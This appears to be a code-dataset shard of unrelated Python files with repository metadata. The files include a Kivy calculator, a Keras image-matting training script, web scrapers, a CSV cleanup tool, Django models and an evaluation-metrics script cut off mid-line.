cfile.write(APP_DICT_ENTR_FILE, wordEntry)
APP_DICT_CLIP_FILE = APP_DICT_DIR + cfile.cleanse_filename(APP_DICT_CLIP.format(WORD=listWord))
if os.path.isfile(APP_DICT_CLIP_FILE) and os.path.getsize(APP_DICT_CLIP_FILE) > 100:
print("Pronunciation file {} exists. Skipping.".format(APP_DICT_CLIP_FILE))
else:
print("Creating pronunciation file: " + APP_DICT_CLIP_FILE)
cfile.download(connectionPool, wordAudioURL, APP_DICT_CLIP_FILE)
print("\nAdding [{}] to word list file: {}".format(setWord, APP_LIST_FILE))
cfile.append(APP_LIST_FILE, setWord)
#userInput = cinput.get_keypress("\nPress any key to continue ... ")
while True:
nextButton = browser.find_element_by_id("nextButton")
nextButton.click()
print("Clicked Next button")
time.sleep(APP_WAIT_DELAY)
nextWordInfoElement = browser.find_element_by_xpath("//form[contains(@name,'moduleform')]")
nextWordID = nextWordInfoElement.find_element_by_xpath("//*[contains(@id,'_id')]").get_property("value")
if nextWordID == wordID:
coutput.print_err("Page not refreshed. Retrying in {}s ...".format(APP_TIMEOUT_WAIT_DELAY))
time.sleep(APP_TIMEOUT_WAIT_DELAY)
else:
break
except Exception as e:
exceptionName = type(e).__name__
if exceptionName in ["UnexpectedAlertPresentException", "NoSuchElementException"]:
coutput.print_warn("Last page of set reached. Moving to next set ...")
break
else:
# Displays the trace for the error
coutput.print_err(traceback.format_exc())
#coutput.print_err("Exception: " + str(e))
# Accept alert
#time.sleep(1)
#alert = browser.switch_to.alert
#alert.accept()
coutput.print_err("Unhandled exception [{}] occurred. Exiting ...".format(exceptionName))
exit_app(1)
# Resume input and exit
coutput.print_warn("Processing complete. Exiting ...")
exit_app()
|
[
"dito.john@gmail.com"
] |
dito.john@gmail.com
|
fc3c9df607cda43fb98ed8193686c1c6698e35c0
|
a66b228ce00e02bdc4aca96549402bf56a91a44c
|
/building_footprint_segmentation/seg/base_factory.py
|
2714bf18a5a6f292ca87688f39373699015f6258
|
[
"Apache-2.0"
] |
permissive
|
fuzailpalnak/building-footprint-segmentation
|
87c5db956c268236a48a05df9335cbb95572bfc2
|
75f6d6b815efed34f4d7a685dbf616bab18f0f04
|
refs/heads/main
| 2023-09-01T11:40:48.886802
| 2023-08-29T12:35:49
| 2023-08-29T12:35:49
| 308,795,139
| 86
| 29
|
MIT
| 2022-10-25T15:08:48
| 2020-10-31T03:23:25
|
Python
|
UTF-8
|
Python
| false
| false
| 555
|
py
|
from typing import List
class Factory:
def __init__(self):
pass
def create_loader(
self,
root_folder,
image_normalization,
label_normalization,
augmenters,
batch_size,
):
raise NotImplementedError
def create_network(self, name, **kwargs):
raise NotImplementedError
def create_criterion(self, name, **kwargs):
raise NotImplementedError
def create_metrics(self, data_metrics: List[str]):
raise NotImplementedError
|
[
"fuzailpalnak@gmail.com"
] |
fuzailpalnak@gmail.com
|
096a1ae7e9f43c211066e65e3cb3d994e8e1bfb2
|
73e8fdb4db1180085703b0cf827cfa00ce4b3d0d
|
/cleanup_script/fixit.py
|
9d3c6423ddaaede734cfacb16642657f24346795
|
[] |
no_license
|
fredrikbondesson/fredrikbondesson.github.io
|
228a79c4b5c57ceaa71f88e8602b78ffbf15d47f
|
6bbb3f93a792b76488c583069b8c9f54aa31d390
|
refs/heads/master
| 2023-08-18T18:55:32.366470
| 2023-08-12T12:12:17
| 2023-08-12T12:12:17
| 168,958,719
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,410
|
py
|
import sys
def fix_none_in_file(file_name):
with open(file_name) as file: # Use file to refer to the file object
data = file.readline()
prev_value = None
buffer = data.rstrip("\n\r")
while data:
csv_parts = data.split(',')
if 'None' in data:
if prev_value != None and prev_value != 'None':
buffer = buffer.replace('None', prev_value)
if csv_parts[1] != None and csv_parts[1] != 'None':
prev_value = csv_parts[1]
data = file.readline()
print buffer
buffer = data.rstrip("\n\r")
def fix_missing_column_in_file(file_name):
with open(file_name) as file: # Use file to refer to the file object
data = file.readline()
prev_value = None
buffer = data.rstrip("\n\r")
while data:
csv_parts = buffer.split(',')
if len(csv_parts) != 3:
csv_parts.insert(1, prev_value)
buffer = ','.join(csv_parts)
else:
prev_value = csv_parts[1]
data = file.readline()
print buffer
buffer = data.rstrip("\n\r")
def check_order(file_name):
#2016-02-02 19:13:25,37.64,1.72,0.00
# 2016-02-02 19:13:25
#date_time_str = '2018-06-29 08:15:27.243860'
#date_time_obj = datetime.datetime.strptime(date_time_str, '%Y-%m-%d %H:%M:%S.%f')
#print('Date:', date_time_obj.date())
#print('Time:', date_time_obj.time())
import datetime
prev_value = None
with open(file_name) as file: # Use file to refer to the file object
data = file.readline()
data = file.readline()
while data:
csv_parts = data.split(',')
# if timestamp like 2016-02-02 19:13:25
date_time_obj = datetime.datetime.strptime(csv_parts[0], '%Y-%m-%d %H:%M:%S')
# if timestamp like 2017-06-08 22:10
#date_time_obj = datetime.datetime.strptime(csv_parts[0], '%Y-%m-%d %H:%M')
if prev_value != None and date_time_obj < prev_value:
print "data=" + str(date_time_obj)
print "prev_value=" + str(prev_value)
prev_value = date_time_obj
data = file.readline()
def main():
if len(sys.argv) >= 2:
file_name = sys.argv[1]
#fix_none_in_file(file_name)
# Note that nr of columns might need to be adjusted
#fix_missing_column_in_file(file_name)
check_order(file_name)
if __name__== "__main__":
main()
|
[
"fredrik.bondesson@gmail.com"
] |
fredrik.bondesson@gmail.com
|
8c9102f127fc0c01936651ac0ed5c50619655c02
|
b05797c5bc986e15948d82da2faf6ac1eeb1443d
|
/train_model_v16_3.py
|
cd0b6b862265bd92b40994d48e12cac8d6916b76
|
[
"MIT"
] |
permissive
|
vietnamican/Deep-Image-Matting
|
9b917a789f9322727cc1202b0d8766ae89df4b4d
|
436487e680027f07387700fb8ee1486635b82335
|
refs/heads/master
| 2022-06-18T11:09:28.589312
| 2020-05-08T16:05:32
| 2020-05-08T16:05:32
| 258,257,002
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,473
|
py
|
import argparse
import os
import tensorflow.keras as keras
import tensorflow as tf
from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau, TensorBoard
from tensorflow.keras.utils import multi_gpu_model
from config import patience, batch_size, epochs, num_train_samples, num_valid_samples
from data_generator_2 import train_gen, valid_gen
from migrate_v16 import migrate_model, migrate_model_2
from model_v16 import build_encoder_decoder, build_refinement
from utils import overall_loss, get_available_cpus, get_available_gpus, get_initial_epoch
log_dir = './logs_16_5'
checkpoint_models_path = './checkpoints_16_5/cp-{epoch:04d}-{loss:.4f}-{val_loss:.4f}.ckpt'
checkpoint_dir = os.path.dirname(checkpoint_models_path)
if __name__ == '__main__':
# Parse arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--pretrained", help="path to save pretrained model files")
args = vars(ap.parse_args())
pretrained_path = args["pretrained"]
# Callbacks
tensor_board = TensorBoard(log_dir=log_dir, histogram_freq=0, write_graph=True, write_images=True)
# model_names = checkpoint_models_path + 'final.{epoch:02d}-{val_loss:.4f}.hdf5'
model_checkpoint = ModelCheckpoint(filepath=checkpoint_models_path, monitor='val_loss', verbose=1, save_weights_only=True)
early_stop = EarlyStopping('val_loss', patience=patience)
reduce_lr = ReduceLROnPlateau('val_loss', factor=0.1, patience=int(patience / 4), verbose=1)
class MyCbk(keras.callbacks.Callback):
def __init__(self, model):
keras.callbacks.Callback.__init__(self)
self.model_to_save = model
def on_epoch_end(self, epoch, logs=None):
fmt = checkpoint_models_path + 'final.%02d-%.4f.hdf5'
self.model_to_save.save(fmt % (epoch, logs['val_loss']))
# Load our model, added support for Multi-GPUs
num_gpu = len(get_available_gpus())
if num_gpu >= 2:
with tf.device("/cpu:0"):
model = build_encoder_decoder()
model = build_refinement(model)
# if pretrained_path is not None:
# model.load_weights(pretrained_path)
final = multi_gpu_model(model, gpus=num_gpu)
# rewrite the callback: saving through the original model and not the multi-gpu model.
model_checkpoint = MyCbk(model)
else:
model = build_encoder_decoder()
final = build_refinement(model)
# if pretrained_path is not None:
# final.load_weights(pretrained_path)
if len(os.listdir(checkpoint_dir)) > 0:
latest = tf.train.latest_checkpoint(checkpoint_dir)
final.load_weights(latest)
initial_epoch = get_initial_epoch(latest)
else:
migrate_model_2(final)
initial_epoch = 0
final.compile(optimizer='nadam', loss=overall_loss)
print(final.summary())
# keras.utils.plot_model(final, "model_modified.png")
# Final callbacks
callbacks = [tensor_board, model_checkpoint, early_stop, reduce_lr]
# Start Fine-tuning
final.fit(train_gen(),
batch_size=4,
validation_data=valid_gen(),
epochs=epochs,
verbose=1,
callbacks=callbacks,
initial_epoch=initial_epoch,
use_multiprocessing=True,
workers=2
)
|
[
"vietnamican@gmail.com"
] |
vietnamican@gmail.com
|
407e7c198902553c262116841cbf7fd224dc9674
|
2b270ab8e9f948ed2076c4eeff3b072d2b7d9bef
|
/TESTS/shmem_new_test.py
|
3d3c99e8455478e688288f12f5c5a79d70a7503f
|
[] |
no_license
|
davidells/pyshmobj
|
416f8c64700422ee2d8a3edbf6dc42b34c9c48a0
|
4f8902fbff61078f754c75feae75de4b21d9deda
|
refs/heads/master
| 2021-01-13T01:49:38.799951
| 2012-04-23T02:38:31
| 2012-04-23T02:38:31
| 4,108,991
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,011
|
py
|
#!/usr/bin/env python
import shmobj, os, sys, time
def printCurrentMemUse():
print ''
print '========================='
print "Current free mem :", shmobj.freecount()
print '========================='
print ''
def runtest(testnum):
if testnum == 1:
l = []
printCurrentMemUse()
for i in range(2046):
l.append(shmobj.SHMINT(i))
print 'Allocated 2046 SHMINTs'
printCurrentMemUse()
shmobj.add_shmem_pages(8)
print 'Added 8 more pages of shared mem'
printCurrentMemUse()
for i in range(2047):
l.append(shmobj.SHMDBL(i))
print 'Allocated 2047 SHMDBLs'
printCurrentMemUse()
for x in l:
x.delete()
print 'Deleted all shmobjs...'
printCurrentMemUse()
#print l
if __name__=='__main__':
if len(sys.argv) < 2:
print 'usage %s [test number]' % sys.argv[0]
sys.exit(-1)
runtest(int(sys.argv[1]))
|
[
"ells.david@gmail.com"
] |
ells.david@gmail.com
|
43a9c24f0e542a20ef237e8d72c4e66202f8ec62
|
e73b1ee518c217354927299811ede72e8a7830f8
|
/tuneInPodcastScrape.py
|
4f4b82b6215f6e7ff5e3ee8c339e81953ec246e0
|
[] |
no_license
|
fnets/FindBestRssFeed
|
4c67f92e7ee062ec33be2ffae989867f12b25852
|
ecd1d2723c02f483e23780bca707306ce6cb87c4
|
refs/heads/master
| 2021-01-15T15:27:17.200203
| 2016-08-29T22:49:53
| 2016-08-29T22:49:53
| 64,054,732
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,890
|
py
|
import sys
from selenium import webdriver
from bs4 import BeautifulSoup
import re
#Pre: None, but eventually a string that indicates which podcatcher url to search
#Post: Tuple that contains podcast names and their respective categories
def tuneinPodcastScrape(inScraperID):
#Searches through base URL for podcasts names and categories
#currently only works for sitcher's site.
catDict = { #change these to category URLs
'Comedy': 18,
'Business': 14,
'News & Politics': 41,
'Society & Culture': 13,
'Education': 27,
'Entertainment': 52,
'Games & Hobbies': 30,
'Lifestyle & Health': 11,
'Music & Commentary': 39,
'Kids & Family': 55,
'Science & Medicine': 48,
'Religion & Spirituality': 47,
'Sports':49,
'Technology': 48,
'International':41,
'Storytelling': 13,
'Pop Culture, TV & Film': 52,
}
base_url = u'http://tunein.com/radio/'
home = u'Podcasts-c100000088/'
html_source = scrapeSource(base_url+home)
soup = BeautifulSoup(html_source, "html.parser") #allows for parsing and searching of HTML of page
names = []
categories = []
category_link_table = []
column_table = soup.find_all('ul',{'class' : "column"}) #pulls the category list out of the HTML
for x in xrange(len(column_table)):
category_link_table.append(column_table[x].find_all('a',{'class' : "overlay-hover-trigger"})) #pulls the category list out of the HTML
category_links = []
for entry in category_link_table:
entry_contents = entry[0].get('href') #goes through all 'a' tags and pulls the values for href (the URL suffixes)
needed_entry_contents = re.match(r'(\/radio\/)(.*)', entry_contents) #groups the redundant '/stitcher-list/' and unique part of URL suffix
category_links.append(needed_entry_contents.group(2)) #saves the unique portion of the category URL suffixes
print category_links
names = []
for x in xrange(len(category_links)):
html_source = scrapeSource(base_url + category_links[x])
soup = BeautifulSoup(html_source, "html.parser")
show_table = soup.find_all('h3',{'class' : "title"})
for x in xrange(len(show_table)):
names.append(show_table[x].get_text())
print names
'''for x in xrange(len(category_link_table)):
print 'link: ' + category_link_table.contents[0]
#searches through link tags and pulls the URL suffixes needed
for entry in category_link_table:
entry_contents = entry.get('href') #goes through all 'a' tags and pulls the values for href (the URL suffixes)
needed_entry_contents = re.match(r'(\/stitcher\-list\/)(.*)', entry_contents) #groups the redundant '/stitcher-list/' and unique part of URL suffix
category_links.append(needed_entry_contents.group(2)) #saves the unique portion of the category URL suffixes
blah = 1
#z = codecs.open('podcast_names-2.txt', 'w', 'utf-8')
#Cycles through each category, and pulls the podcast names and categories
for x in xrange(len(category_links)):
#if blah > 1:
# break
blah += 1
html_source = scrapeSource(base_url+category_links[x])
soup = BeautifulSoup(html_source, "html.parser") #allows for parsing and searching of HTML of page
podcast_table = soup.findAll("span", {"class": "sl-showName"}) #All podcast names are stored with this class name in a dynamically created table
category_table = soup.findAll("span", {"class": "sl-category"}) #All categories for podcasts found in previous line are stored with this class name in a dynamically created table
for p in podcast_table:
names.append(unicode(p.find('a').contents[0])) #pulls podcast names from link contents
for p in category_table:
if catDict[p.contents[0]] != 0: #does not include family and children podcasts
categories.append(unicode(catDict[p.contents[0]])) #pulls category names from link contents
podcasts = zip(names, categories) #creates a list of tuples where each entry is (name, category)
json.dump(podcasts, codecs.open('podcasts-stitcher.json', 'w', 'utf-8') )
'''
exit(0)
assert (type(podcasts[1]) is tuple), "getPodcastNames: List is not tuples"
assert (podcasts), "getPodcastNames: List is empty"
return podcasts #After demo, return to categories returned, tooxs
def scrapeSource(url):
browser = webdriver.Chrome()
browser.get(url) #opens chrome browser to witdraw data
html_source = browser.page_source #Maybe could be done with regex or etree, but this is much more elegant
browser.close()
return html_source
if __name__ == '__main__':
tuneinPodcastScrape(sys.argv[1])
|
[
"kingoftherobots@gmail.com"
] |
kingoftherobots@gmail.com
|
c09f52280dc41c5f39ce9079c87c23b2bf529992
|
d08acb5acc5e1bb6b5ea9cdaa496a78fc155abf5
|
/main.py
|
2b8f0a89deecbf5022ad8eb2a3bf38d5e8f7689b
|
[] |
no_license
|
SushilCodes/myproject
|
f0d1165ac4341817e25b24d01ad23d945de57acf
|
819671266bb3e5107f6faf4845f2aea537ee7e8c
|
refs/heads/main
| 2023-08-31T16:15:06.214825
| 2021-10-07T08:15:23
| 2021-10-07T08:15:23
| 414,515,824
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,422
|
py
|
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
from kivy.uix.textinput import TextInput
class MainApp(App):
def build(self):
self.operators = ["/", "*", "+", "-"]
self.last_was_operator = None
self.last_button = None
main_layout = BoxLayout(orientation="vertical")
self.solution = TextInput(
multiline=False, readonly=True, halign="right", font_size=60
)
main_layout.add_widget(self.solution)
buttons = [
["7", "8", "9", "/"],
["4", "5", "6", "*"],
["1", "2", "3", "-"],
[".", "0", "C", "+"],
]
for row in buttons:
h_layout = BoxLayout()
for label in row:
button = Button(
text=label,
pos_hint={"center_x": 0.5, "center_y": 0.5},
)
button.bind(on_press=self.on_button_press)
h_layout.add_widget(button)
main_layout.add_widget(h_layout)
equals_button = Button(
text="=", pos_hint={"center_x": 0.5, "center_y": 0.9}
)
equals_button.bind(on_press=self.on_solution)
main_layout.add_widget(equals_button)
return main_layout
def on_button_press(self, instance):
current = self.solution.text
button_text = instance.text
if button_text == "C":
# Clear the solution widget
self.solution.text = ""
else:
if current and (
self.last_was_operator and button_text in self.operators):
# Don't add two operators right after each other
return
elif current == "" and button_text in self.operators:
# First character cannot be an operator
return
else:
new_text = current + button_text
self.solution.text = new_text
self.last_button = button_text
self.last_was_operator = self.last_button in self.operators
def on_solution(self, instance):
text = self.solution.text
if text:
solution = str(eval(self.solution.text))
self.solution.text = solution
if __name__ == "__main__":
app = MainApp()
app.run()
|
[
"noreply@github.com"
] |
SushilCodes.noreply@github.com
|
43483376de2352910d6792c67cb5d3fb53919eaa
|
300088546b9fcb8d93ee5c648be8409eb0ea662e
|
/myapp/models.py
|
8380ca0ff65cf2ec9112f08bc87696dab4c8fd44
|
[] |
no_license
|
IshjotSingh97/Interviewbit-Academy-Assignment
|
6a750bad31917cb5fbcd9b90692bdf5fb2e1576c
|
ae1894f45961563e55a78d7c00fd5d6ee23eb0c0
|
refs/heads/main
| 2023-01-06T21:25:47.424504
| 2020-11-12T22:01:27
| 2020-11-12T22:01:27
| 311,994,520
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 466
|
py
|
from django.db import models
# Create your models here.
class Participant(models.Model):
useremail = models.CharField(max_length=30)
class Interview(models.Model):
title = models.CharField(max_length=30)
date = models.DateField()
starttime = models.TimeField()
endtime = models.TimeField()
class Schedule(models.Model):
participant = models.ForeignKey(Participant,on_delete=models.CASCADE)
interview = models.ForeignKey(Interview,on_delete=models.CASCADE)
|
[
"ishjotsinghahluwalia@gmail.com"
] |
ishjotsinghahluwalia@gmail.com
|
de907d3883cd7669c470ba438fea450e34ac4aa2
|
d31b951902843af0a719fe291c70ec3a5741a96b
|
/Week4/exercise7_4.py
|
9a37c09478c9b80f94da99bcd9397dbcac19367e
|
[] |
no_license
|
bhamburg/CIS_626
|
ff3298dabb46fc13bb0fbad831c8b3a6f2644208
|
b4d84a664a2228d07036c3d119fa94cd894bb241
|
refs/heads/master
| 2020-03-29T20:07:01.143791
| 2014-03-06T01:36:29
| 2014-03-06T01:36:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,275
|
py
|
# The Fan class
# Author: Brian Hamburg
SLOW = 1
MEDIUM = 2
FAST = 3
class Fan:
def __init__(self, speed = SLOW, radius = 5, color = "blue", on = False):
self.__speed = speed
self.__radius = radius
self.__color = color
self.__on = on
def getSpeed(self):
return self.__speed
def getRadius(self):
return self.__radius
def getColor(self):
return self.__color
def isOn(self):
return self.__on
def setSpeed(self, speed):
self.__speed = speed
def setRadius(self, radius):
self.__radius = radius
def setColor(self, color):
self.__color = color
def setOn(self, on):
self.__on = on
def displayProperties(fan):
print("speed", fan.getSpeed(), "\n", "color", fan.getColor(), "\n",
"radius", fan.getRadius(), "\n", "fan is on" if fan.isOn() else "fan is off")
def main():
fan1 = Fan()
fan1.setSpeed(FAST)
fan1.setRadius(10)
fan1.setColor("yellow")
fan1.setOn(True)
displayProperties(fan1)
fan2 = Fan()
fan2.setSpeed(MEDIUM)
fan2.setRadius(5)
fan2.setColor("blue")
fan2.setOn(False)
displayProperties(fan2)
main()
|
[
"bhamburg@gmail.com"
] |
bhamburg@gmail.com
|
550046117483a93251737487cfe4c6fc3d6ec916
|
b13a326c8aac68f72c71169187a4aa8d4fe1438f
|
/sim2real/info_masker.py
|
ef54bc6e378d78675bb9531fc2bf42bfd17b16f3
|
[] |
no_license
|
zy10zm/Pulsar
|
9f1d9abdf90d94e80c6dba2a02630bfe4b4e2115
|
714ee2d78577e59077af7c0f890e639879490eb8
|
refs/heads/master
| 2023-02-22T20:26:42.995175
| 2021-01-23T04:35:38
| 2021-01-23T04:35:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,996
|
py
|
import numpy as np
import sys
from copy import deepcopy
from architecture.entity_encoder.entity_formatter import Entity_formatter
class InfoMasker:
def __init__(self, n_agents, mjco_ts, n_substeps):
self.n_agents = n_agents
self.mjco_ts = mjco_ts
self.n_substeps = n_substeps
self.entity_formatter = Entity_formatter()
# Frequency parameters
self.my_qpos_freq = 0.005
self.my_qvel_freq = 0.005
self.local_qvel_freq = 0.005
self.teammate_info_freq = 0.020
self.opponent_info_freq = 0.060
self.rrsystem_info_freq = 0.050
self.my_qpos_std = 0.0001
self.my_qvel_std = 0.0001
self.local_qvel_std = 0.0001
self.teammate_info_std = 0.001
self.opponent_info_std = 0.001
self.rrsystem_info_std = 0.0001
def generate_info_trajectory(self, t_per_eval, t_per_eval_std):
# Create sampling timesteps
info_sample_ts = [self.secs_to_steps(np.random.normal(t_per_eval, t_per_eval_std))]
max_sample_ts = 0
while max_sample_ts < self.secs_to_steps(3 * 60):
info_sample_ts.append(
self.secs_to_steps(np.random.normal(t_per_eval, t_per_eval_std)) + info_sample_ts[-1]
)
max_sample_ts = max(max_sample_ts, info_sample_ts[-1])
return info_sample_ts
def reset_masker(self):
# Trajectories for obs
self.obs_trajectory = [{
"my_qpos": [self.generate_info_trajectory(self.my_qpos_freq, self.my_qpos_std), 0],
"my_qvel": [self.generate_info_trajectory(self.my_qvel_freq, self.my_qvel_std), 0],
"local_qvel": [self.generate_info_trajectory(self.local_qvel_freq, self.local_qvel_std), 0],
"teammate_qpos": [self.generate_info_trajectory(self.teammate_info_freq, self.teammate_info_std), 0],
"opponent1_qpos": [self.generate_info_trajectory(self.opponent_info_freq, self.opponent_info_std), 0],
"opponent2_qpos": [self.generate_info_trajectory(self.opponent_info_freq, self.opponent_info_std), 0],
"my_hp": [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0],
"teammate_hp": [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0],
"opponent1_hp": [self.generate_info_trajectory(self.opponent_info_freq, self.opponent_info_std), 0],
"opponent2_hp": [self.generate_info_trajectory(self.opponent_info_freq, self.opponent_info_std), 0],
"my_projs": [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0],
"teammate_projs": [self.generate_info_trajectory(self.rrsystem_info_freq, self.teammate_info_std), 0],
"opponent1_projs": [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0],
"opponent2_projs": [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0],
"my_armors": [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0],
"teammate_armors": [self.generate_info_trajectory(self.rrsystem_info_freq, self.teammate_info_std), 0]
} for _ in range(self.n_agents)]
for ai in range(self.n_agents):
hp_deduct_traj = [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0]
self.obs_trajectory[ai]["my_hp_deduct"] = deepcopy(hp_deduct_traj)
self.obs_trajectory[ai]["my_hp_deduct_res"] = deepcopy(hp_deduct_traj)
zone_traj = [self.generate_info_trajectory(self.rrsystem_info_freq, self.rrsystem_info_std), 0]
self.obs_trajectory[ai]["zone_1"] = deepcopy(zone_traj)
self.obs_trajectory[ai]["zone_2"] = deepcopy(zone_traj)
self.obs_trajectory[ai]["zone_3"] = deepcopy(zone_traj)
self.obs_trajectory[ai]["zone_4"] = deepcopy(zone_traj)
self.obs_trajectory[ai]["zone_5"] = deepcopy(zone_traj)
self.obs_trajectory[ai]["zone_6"] = deepcopy(zone_traj)
# Obs for agents
self.agent_obs = self.entity_formatter.get_empty_obs_with_shapes(1, self.n_agents)
self.agent_obs_mask = [{k: 0 for k in self.agent_obs.keys()} for _ in range(self.n_agents)]
self.buffered_agent_obs = deepcopy(self.agent_obs)
def step(self, env_ts, entities):
for ai in range(self.n_agents):
for k in self.obs_trajectory[ai].keys():
if env_ts == 0:
self.buffered_agent_obs[k][0, ai] = deepcopy(entities[ai][k])
elif self.obs_trajectory[ai][k][1] < len(self.obs_trajectory[ai][k][0]) and self.obs_trajectory[ai][k][0][self.obs_trajectory[ai][k][1]] >= env_ts:
self.agent_obs[k][0, ai] = deepcopy(self.buffered_agent_obs[k][0, ai])
self.agent_obs_mask[ai][k] = 1
self.obs_trajectory[ai][k][1] += 1
self.buffered_agent_obs[k][0, ai] = deepcopy(entities[ai][k])
def get_masked_entities(self, agent_no):
masks_of_obs = deepcopy(self.agent_obs_mask[agent_no])
masked_obs = dict()
for k, observable in masks_of_obs.items():
if observable:
masked_obs[k] = self.agent_obs[k][:, agent_no:agent_no+1]
else:
masked_obs[k] = np.zeros(self.agent_obs[k][:, agent_no:agent_no+1].shape)
self.agent_obs_mask[agent_no][k] = 0
return masks_of_obs, masked_obs
def secs_to_steps(self, secs):
return int(secs / (self.mjco_ts * self.n_substeps))
|
[
"impeccableaslan@gmail.com"
] |
impeccableaslan@gmail.com
|
a4e3d0bc23d557c65a16e5cc90d7dcb4be6d8711
|
74ac9f8b3fd6fea863aebd1bc01aff3c23380bc5
|
/backend/src/loop_client.py
|
7ecd04bcb679421f30374ff5d2050e5961a26b4c
|
[
"LicenseRef-scancode-public-domain",
"MIT"
] |
permissive
|
horietakehiro/NstPlaycloud
|
a4715c9465999f8e699b6047ebc9f0b3cb9fd783
|
56a8461c6bebc3b24850380e0a69e3df4f88a8ee
|
refs/heads/master
| 2022-12-27T02:29:40.117492
| 2020-10-09T10:37:21
| 2020-10-09T10:37:21
| 289,490,898
| 0
| 0
| null | 2020-10-05T13:07:18
| 2020-08-22T13:15:56
|
Python
|
UTF-8
|
Python
| false
| false
| 219
|
py
|
from transfer.client import transfer_client
import time
if __name__ == "__main__":
# loop client's main function
while True:
resp = transfer_client.main()
print(resp)
time.sleep(10)
|
[
"nashhoward1312@docomo.ne.jp"
] |
nashhoward1312@docomo.ne.jp
|
c94bcc00ec7509cf898b0918d3f0549f5b6a1859
|
10bdc87263965b798b4db7f62a86ad2df1fcf756
|
/Valideaza.py
|
687e31961b37060c9fa79666b865b06af3e74492
|
[] |
no_license
|
Nechita-Andrei/evenimente
|
8a78b1269d4b88ae7a4e311cc8fcbaba01621a7d
|
a84fcfee2fdfb26d2f77c9116cc3cf35ab5494ba
|
refs/heads/master
| 2022-04-19T17:27:48.383038
| 2020-03-13T22:39:08
| 2020-03-13T22:39:08
| 247,172,565
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,492
|
py
|
'''
Created on 13 mar. 2020
@author: bogne
'''
from validare.ValidError import ValidError
class ValideazaPersoana(object):
def valideazaPersoana(self,persoana):
erori = ""
if not len(persoana.get_id()) == 13:
erori += "id invalid!\n"
if persoana.get_nume() == "":
erori += "nume invalid!\n"
if len(persoana.get_adresa()) <= 3:
erori += "adresa invalida!\n"
if len(erori) != 0:
raise ValidError(erori)
class ValideazaEveniment(object):
def valideazaEveniment(self,event):
erori = ""
if event.get_id() < 1:
erori += "id invalid!\n"
ok = False
data = event.get_data().split("/")
if len(data) == 3:
if int(data[0]) > 0 and int(data[0]) < 32:
if int(data[1]) > 0 and int(data[1]) < 13:
if int(data[2]) > 2017 and int(data[2]) < 2020:
ok = True
if ok == False:
erori += "data invalida!\n"
ora = event.get_timp().split(":")
if int(ora[0])<0 or int(ora[0])> 23 or int(ora[1])<0 or int(ora[1])>59:
erori += "ora invalida!\n"
if len(event.get_descriere()) <3:
erori += "descriere invalida!\n"
if erori != "":
raise ValidError(erori)
|
[
"noreply@github.com"
] |
Nechita-Andrei.noreply@github.com
|
9d90ee73151f2714debf72cb43a5a97f3ba9983a
|
38f06b8e701b53b2659ac6def3c6b24f26d7f0fa
|
/demo/test.py
|
f129ef88bb0f188182e64d041b45b76c86b0f1da
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
drapedapp/maskrcnn-benchmark
|
67626f2fa7aae4bdb1f5d7d0ed93106bb5eb468d
|
e6494f7b7612cf23b48a57102b03ed0ca530a950
|
refs/heads/master
| 2020-05-04T00:17:15.854897
| 2019-05-16T16:23:56
| 2019-05-16T16:23:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 489
|
py
|
from maskrcnn_benchmark.config import cfg
from predictor import COCODemo
config_file = "configs/caffe2/e2e_mask_rcnn_R_50_FPN_1x_caffe2.yaml"
# update the config options with the config file
cfg.merge_from_file(config_file)
# manual override some options
cfg.merge_from_list(["MODEL.DEVICE", "cpu"])
coco_demo = COCODemo(
cfg,
min_image_size=800,
confidence_threshold=0.7,
)
# load image and then run prediction
image = ...
predictions = coco_demo.run_on_opencv_image(image)
|
[
"shaayaansayed@gmail.com"
] |
shaayaansayed@gmail.com
|
f65f22ea29aca677ecd69502b311e29eea1efc40
|
0280fc1aa108b5d8cb73cdb67ba6293ee20d4435
|
/code/metrics.py
|
0b03b4448a0fc9d813a9f6807c352994a16258a8
|
[] |
no_license
|
danielcomerio/2021-SBAI-Covid19_em_RaioX
|
bd8eee7e2c4f7052a5939ec7f1d6eeed0e459d74
|
90c981788c6c9b96e2cab15fd3de5c41a1024553
|
refs/heads/main
| 2023-08-02T15:06:26.831516
| 2021-10-02T23:24:37
| 2021-10-02T23:24:37
| 360,781,005
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,423
|
py
|
from sklearn.metrics import confusion_matrix, accuracy_score, precision_score, f1_score, recall_score, classification_report
import numpy as np
import argparse
def parse_command_line_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"-me", "--metrics", help="path to the metrics file", type=str, default="metrics.txt")
args = parser.parse_args()
return args
def main():
args = parse_command_line_args()
file_metrics = open(args.metrics, "r")
#file_metrics.write("path_imagem, classe_real, classe_predita")
label_list = []
predict_list = []
line = file_metrics.readline()
while line:
line = line.strip().split(", ")
label_list.append(line[1])
prediction = [float(line[2]), float(line[3]), float(line[4])]
prediction = np.argmax(prediction, axis=-1)
predict_list.append(str(prediction))
line = file_metrics.readline()
file_metrics.close()
print("confusion_matrix: \n", confusion_matrix(label_list, predict_list))
print("accuracy_score:", accuracy_score(label_list, predict_list))
print("precision_score:", precision_score(
